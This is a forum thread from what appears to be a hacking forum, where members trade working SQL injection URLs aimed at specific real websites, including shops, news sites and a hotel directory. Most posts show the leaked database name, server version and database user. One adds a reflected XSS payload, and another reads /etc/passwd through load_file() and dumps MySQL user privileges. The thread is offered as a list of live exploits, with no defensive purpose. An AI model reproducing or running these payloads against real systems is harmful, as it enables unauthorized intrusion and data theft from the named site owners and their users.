SQL Injections

Discussion in 'Vulnerabilities' started by yarbabin, 27 Apr 2015.

  1. BenderMR

    BenderMR Member

    stanok
    Code:
    http://stanok.in.ua/details.php?id=-21292%20union%20select%201,2,3,4,5,6,7,8,9,concat_ws(0x7c,database(),version(),user()),11,12,13,14,15,16,17,18,19,20
    ininterne1_stan|5.5.42-log|ininterne1_stan@192.168.1.41

    some Spanish shop
    Code:
    http://tecnicellmaracaibo.com/product.php?id=-175%27%20uNiOn%20SeLeCt%201,2,concat_ws(0x7c,database(),version(),user()),4,5,6,7,8,9,10,11,12,13--+-
    
    tecni_sitio|5.6.43|tecni@localhost
     
  2. BenderMR

    BenderMR Member

    Code:
    http://eirc-icai.org/event_details.php?EircstrID=-1473)%20union%20select%201,2,3,4,5,6,7,8,9,10,concat_ws(0x7c,database(),version(),user()),12,13,14,15,16,17,18,19,20,21--+-&type=2
    
    db_eircicai|5.5.51|koresoft@localhost

    and XSS right here as well
    Code:
    http://eirc-icai.org/event_details.php?EircstrID=-1473)%20union%20select%201,2,3,4,5,6,7,8,9,10,%3Cscript%3Ealert(%27xss/sqli%27)%3C/script%3E,12,13,14,15,16,17,18,19,20,21--+-&type=2
    
     
  3. BabaDook

    BabaDook Level 8

    This is called SiXSS
     
    ms13 likes this.
  4. sepo

    sepo Member

    Code:
    http://www.vepakistan.com/detail.php?id=-40+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat_ws(0x3a,version(),database(),user()),19,20--
     
    BabaDook likes this.
  5. DezMond™

    DezMond™ Elder

    Code:
    http://www.fc-utd.co.uk/report.php?match_id=-1901+union+select+user()+--+
     
    BabaDook likes this.
  6. WallHack

    WallHack Elder

    Code:
    http://www.kaspiy.az/news.php?id=-103085 UNION SELECT 1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 -- -
     
    BenderMR likes this.
  7. RedHazard

    RedHazard Member

    Code:
    https://reference-audio-analyzer.pro/review-report.php?id=1691' AND (SELECT 3106 FROM(SELECT COUNT(*),CONCAT(0x7171767671,(SELECT (ELT(3106=3106,1))),0x717a716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Pzbc'='Pzbc
     
    BenderMR likes this.
  8. BenderMR

    BenderMR Member

    MegaKeys.RU
    Code:
    https://megakeys.ru/soft/product.php?id_d=1972300%27%20union%20select%201,2,3,4,5,6,7,concat_ws(%27|%27,%20database(),user(),version()),9,10--+-#&rtype=good&page=9
     
    RedHazard likes this.
  9. sepo

    sepo Member

    Code:
    http://www.semsk.kz/newscat.php?id=-1+union+select+concat_ws(0x3a,version(),database(),user())+--+
     
    BenderMR likes this.
  10. BenderMR

    BenderMR Member

    BChainHacks
    Code:
    https://www.bchainhacks.com/event.php?id=-122%20%20UNION%20ALL%20SELECT%201,2,concat_ws(0x7c,database(),version(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34
    bchain_live|10.2.24-MariaDB|bchain_live_user@localhost
     
  11. Baskin-Robbins

    Baskin-Robbins Well-Known Member

    Code:
    www.all-guitar-chords.com/topic.php?id=-4794' union all select concat_ws(0x23,version(),database(),user(),load_file('/etc/passwd')),2,3,4,5,6,7,8,9,10,group_concat(concat_ws(0x3a3a,host,user,file_priv,insert_priv,update_priv) SEPARATOR " ") FROM mysql.user --%20
    
    5.5.52-MariaDB
    Code:
    https://www.txdirectory.com/online/abc/detail.php?id=217 union select concat_ws(0x3a3a,version(),user(),database(),group_concat(table_name separator " ")),2,3,4 from information_schema.tables where table_schema=database() --%20
    
    5.5.61-0ubuntu0.14.04.1-log
    Code:
    https://www.hotelnewsresource.com/go.php?id=-1298989163' or (select count(*) from (select 1 union select 2 union select 3)x group by concat(substring(concat_ws(0x23,version(),(select schema_name from information_schema.schemata limit 3,1),(select file_priv from mysql.user where user='root' and host='localhost'),0x23), 1), floor(rand(0)*2))) --%20
    
    5.5.60-MariaDB
     